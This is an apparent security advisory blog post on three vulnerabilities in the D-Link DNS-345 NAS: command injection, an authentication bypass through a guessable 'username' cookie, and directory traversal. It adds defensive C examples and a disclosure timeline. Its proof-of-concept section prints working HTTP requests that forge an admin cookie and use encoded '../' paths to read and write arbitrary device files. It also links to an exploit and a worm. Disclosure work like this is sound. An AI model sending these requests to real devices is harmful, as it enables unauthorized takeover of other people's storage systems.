Wednesday, January 21, 2015

[Exploit] D-Link DNS-345 Network Storage System

D-Link DNS-345 Network Storage System
Note: CVE-2014-2691 and CVE-2014-2692 are used in my N.A.S.ty Worm

Vulnerability: Command Injection
CVE: CVE-2014-2691

Description
The D-Link DNS-345 network storage system is susceptible to several command injection attacks, which allow an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 bypasses authentication.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but when used in conjunction with the Missing Function Level Access Control vulnerability (below), a remote adversary can call the “/cgi-bin/system_mgr.cgi” program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the stand-alone proof of concept exploit and in the N.A.S.ty worm.

This exploit should work against other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible.
- If no suitable API exists for the operation, sanitize user input before passing it to a function or class method that executes system commands.
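As an added example, written for this page and not taken from D-Link's firmware or ISE's proof of concept, the following C shows what those two recommendations look like inside a CGI handler: a hypothetical safe_ping() validates the value against an allowlist and then runs the helper through execvp() with an argument vector, so /bin/sh never sees the user's input. The names arg_is_safe, run_without_shell and safe_ping are assumptions, not functions from the device.

```c
/* Added example, not D-Link's or ISE's code: running a helper program
   with a user-controlled argument without going through /bin/sh.
   The hypothetical handler safe_ping() stands in for a CGI action such as
   a "ping host" diagnostic. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist validation: accept only characters that can legitimately
   appear in a hostname or IPv4 literal. Returns 1 if the value is usable
   as an argument, 0 otherwise. */
int arg_is_safe(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 253)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-'))
            return 0;
    }
    /* A leading '-' would be read as an option by the helper program. */
    return s[0] != '-';
}

/* Run argv[0] via fork()/execvp(): the argument vector goes straight to
   the program, so no shell ever parses it and characters such as ';' or
   '|' have no special meaning. Returns the child's exit status, 127 if
   the program could not be executed, or -1 on a fork/wait error. */
int run_without_shell(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);               /* only reached if execvp() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The pattern to avoid, shown for contrast and never called here: the
   formatted string is handed to /bin/sh, which interprets everything the
   user put into `host`.
 *
 *   snprintf(cmd, sizeof cmd, "ping -c 1 %s", host);
 *   system(cmd);
 */

/* Validated argument plus direct execution. Returns -1 without running
   anything if the input fails the allowlist. */
int safe_ping(const char *host)
{
    if (!arg_is_safe(host))
        return -1;
    char *argv[] = { "ping", "-c", "1", (char *)host, NULL };
    return run_without_shell(argv);
}
```

The allowlist is deliberately narrow: it is easier to widen a character set for a real use case than to enumerate every shell metacharacter a denylist would have to catch, and execvp() means the check is defence in depth rather than the only barrier.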

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-2692

Description
The D-Link DNS-345 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allow an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie-based authentication mechanism utilized by D-Link storage systems is severely broken and insecure. For example, D-Link uses an authentication cookie named “username”, with the value set to the username of the newly authenticated user. This is cryptographically insecure and allows an adversarial user to hijack an authenticated session simply by guessing the valid username of an authenticated user.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other D-Link Network Storage Systems.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should perform server-side authentication and authorization checks on all system resources.
- Proper session management should be used: cookie values should be randomly generated with a cryptographically secure generator.
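The session management recommendation as an added example, not D-Link's code: the cookie carries a random 256-bit token read from /dev/urandom, the username lives only in a server-side table, and the lookup uses a constant-time comparison. new_session_token, token_equal, create_session, lookup_session and the fixed-size session table are assumed names for illustration.

```c
/* Added example, not D-Link's or ISE's code: a session cookie that carries
   a random token instead of the username, with the username kept
   server-side. The fixed-size session table is a stand-in for whatever
   store a real CGI would use. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define TOKEN_BYTES 32                    /* 256 bits of entropy */
#define TOKEN_HEX   (TOKEN_BYTES * 2 + 1) /* hex digits plus NUL */
#define MAX_SESSIONS 16

/* Fill out[] with TOKEN_BYTES random bytes from /dev/urandom (the kernel
   CSPRNG), hex-encoded. Returns 0 on success, -1 if the bytes could not be
   read; a caller must never fall back to a predictable value. */
int new_session_token(char out[TOKEN_HEX])
{
    unsigned char raw[TOKEN_BYTES];
    int fd = open("/dev/urandom", O_RDONLY);
    if (fd < 0)
        return -1;
    size_t got = 0;
    while (got < sizeof raw) {
        ssize_t n = read(fd, raw + got, sizeof raw - got);
        if (n <= 0) {
            close(fd);
            return -1;
        }
        got += (size_t)n;
    }
    close(fd);
    for (size_t i = 0; i < sizeof raw; i++)
        snprintf(out + 2 * i, 3, "%02x", raw[i]);
    return 0;
}

/* Compare two tokens without returning early on the first mismatch, so the
   time taken does not reveal how much of a guess was right. Returns 1 if
   equal, 0 otherwise. */
int token_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    if (la != lb)
        return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < la; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Server-side session table. The cookie sent to the browser is only the
   token; the identity bound to it never leaves the server. */
struct session {
    char token[TOKEN_HEX];   /* empty string marks a free slot */
    char user[32];
};
static struct session sessions[MAX_SESSIONS];

/* Log a user in: returns the token to place in the Set-Cookie header, or
   NULL if no slot is free or no randomness was available. */
const char *create_session(const char *user)
{
    for (size_t i = 0; i < MAX_SESSIONS; i++) {
        if (sessions[i].token[0] != '\0')
            continue;
        if (new_session_token(sessions[i].token) != 0)
            return NULL;
        snprintf(sessions[i].user, sizeof sessions[i].user, "%s", user);
        return sessions[i].token;
    }
    return NULL;
}

/* Resolve a cookie value to a username, or NULL if it matches no live
   session. Sending "admin" as the cookie value no longer means anything. */
const char *lookup_session(const char *cookie_value)
{
    for (size_t i = 0; i < MAX_SESSIONS; i++)
        if (sessions[i].token[0] != '\0' &&
            token_equal(sessions[i].token, cookie_value))
            return sessions[i].user;
    return NULL;
}
```

With this layout the cookie named “username” in the requests on this page would be meaningless: the only value the server accepts is one it generated itself, and guessing a 256-bit token is not a practical attack.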

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-2692 is demonstrated in conjunction with CVE-2014-2691 - https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Multiple Directory Traversal Vulnerabilities
CVE: CVE-2014-2693

Description
The D-Link DNS-345 network storage system is susceptible to Directory Traversal attacks, which ultimately allow an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 bypasses authentication.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should refrain from using user-supplied input in calls to the file system.
- Developers should perform path canonicalization.
- Properly configure network services.
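Path canonicalization as an added example (not D-Link's code, and not a description of how the device's webfile_mgr.cgi behaves): confine_path() URL-decodes the parameter, joins a relative value onto the share root, normalizes “.”, “..” and repeated slashes lexically, and then accepts the result only if it is the root itself or lies below “root/”. The share root /mnt/HD/HD_a2 is the mount point that appears in the requests in the Proof of Concept section; the function names are assumptions. A production handler would additionally resolve the result with realpath() so that symlinks cannot lead outside the share, which a lexical check alone does not cover.

```c
/* Added example, not D-Link's or ISE's code: confining a user-supplied
   path parameter to a share root before it touches the file system.
   confine_path() and its helpers are hypothetical names; the root
   "/mnt/HD/HD_a2" is the mount point from the requests on this page. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 4096

/* Decode %XX escapes from src into dst. Returns 0, or -1 on a malformed
   escape, an encoded NUL byte, or an over-long result. */
static int url_decode(const char *src, char *dst, size_t dstlen)
{
    size_t j = 0;
    for (size_t i = 0; src[i] != '\0'; i++) {
        unsigned c = (unsigned char)src[i];
        if (c == '%') {
            if (!isxdigit((unsigned char)src[i + 1]) ||
                !isxdigit((unsigned char)src[i + 2]))
                return -1;
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            c = (unsigned)strtoul(hex, NULL, 16);
            i += 2;
        }
        if (c == 0 || j + 1 >= dstlen)
            return -1;
        dst[j++] = (char)c;
    }
    dst[j] = '\0';
    return 0;
}

/* Lexically normalize an absolute path into out: drop empty and "."
   components and resolve ".." without ever rising above "/". Returns 0, or
   -1 if out is too small. */
static int normalize(const char *path, char *out, size_t outlen)
{
    if (outlen < 2)
        return -1;
    strcpy(out, "/");
    const char *p = path;
    while (*p != '\0') {
        while (*p == '/')
            p++;
        if (*p == '\0')
            break;
        const char *start = p;
        while (*p != '\0' && *p != '/')
            p++;
        size_t clen = (size_t)(p - start);
        if (clen == 1 && start[0] == '.')
            continue;
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            char *slash = strrchr(out, '/');
            if (slash == out)
                out[1] = '\0';        /* already at "/"; stay there */
            else
                *slash = '\0';
            continue;
        }
        size_t len = strlen(out);
        if (len + (len == 1 ? 0 : 1) + clen + 1 > outlen)
            return -1;
        if (len != 1)
            out[len++] = '/';
        memcpy(out + len, start, clen);
        out[len + clen] = '\0';
    }
    return 0;
}

/* Decode, join a relative input onto root, normalize, then require the
   result to be root itself or to lie strictly below "root/". On success
   the path to use is in out and 0 is returned; anything that escapes root
   (or cannot be decoded) returns -1 and out must not be used. */
int confine_path(const char *root, const char *user_path,
                 char *out, size_t outlen)
{
    char decoded[PATH_BUF], joined[2 * PATH_BUF], normroot[PATH_BUF];
    if (url_decode(user_path, decoded, sizeof decoded) != 0)
        return -1;
    snprintf(joined, sizeof joined, "%s%s%s",
             decoded[0] == '/' ? "" : root,
             decoded[0] == '/' ? "" : "/", decoded);
    if (normalize(joined, out, outlen) != 0 ||
        normalize(root, normroot, sizeof normroot) != 0)
        return -1;
    size_t rl = strlen(normroot);
    if (rl == 1)                      /* root is "/": everything is below it */
        return 0;
    /* A plain prefix test would accept "/mnt/HD/HD_a22" for root
       "/mnt/HD/HD_a2"; the next character must be '/' or end of string. */
    if (strncmp(out, normroot, rl) != 0 ||
        (out[rl] != '\0' && out[rl] != '/'))
        return -1;
    return 0;
}
```

Decoding happens exactly once and before normalization, which is what makes the encoded “..%2F” sequences in the requests on this page collapse to a path outside the root and get rejected; a check performed on the still-encoded string would see no “..” at all.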

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- The following HTTP requests show how an attacker can read from and write to the D-Link DNS-345 filesystem. Remember, while calls to “webfile_mgr.cgi” require authentication, an attacker can circumvent this by utilizing the methods described under CVE-2014-2692.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Content-Length: 95
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 53
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html



—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 111
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX



POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Cookie: username=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX





Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/21/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
